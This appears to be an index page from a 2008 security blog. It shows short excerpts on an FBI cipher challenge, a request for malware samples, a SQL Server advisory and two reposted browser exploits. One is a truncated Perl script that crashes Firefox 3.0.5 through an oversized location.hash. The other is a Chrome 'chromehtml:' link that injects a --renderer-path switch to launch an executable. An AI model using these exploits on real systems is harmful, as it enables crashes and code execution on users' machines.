Monday, December 29th, 2008 The FBI today challenged anyone in the online community to break a cipher code on its site. The code was created by FBI cryptanalysts. The bureau invited hackers to a similar code-cracking challenge last year and got tens of thousands of responses it said.A number of sites host such cipher ...
Posted in Coding, Internet, Security | No Comments
Sunday, December 28th, 2008 I am looking to do some analysis on various pieces of malware. Please forward me some of your junk and any questionable attachments that you may get in your Inbox. This will be private analysis so please do not expect to hear anything back about what you send.Please send to:malware@pcsympathy.comThanks,Troy
Posted in Coding, General BS, Internet, Security | No Comments
Tuesday, December 23rd, 2008 #!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP$filename = $ARGV[0];
if(!defined($filename))
{print "Usage: $0 <filename.html>\n\n";}$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Tuesday, December 23rd, 2008 Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.htmlclick the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>Source:
http://www.milw0rm.com/exploits/7566
Posted in Coding, Internet, Security, Software | No Comments
Monday, December 22nd, 2008 Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
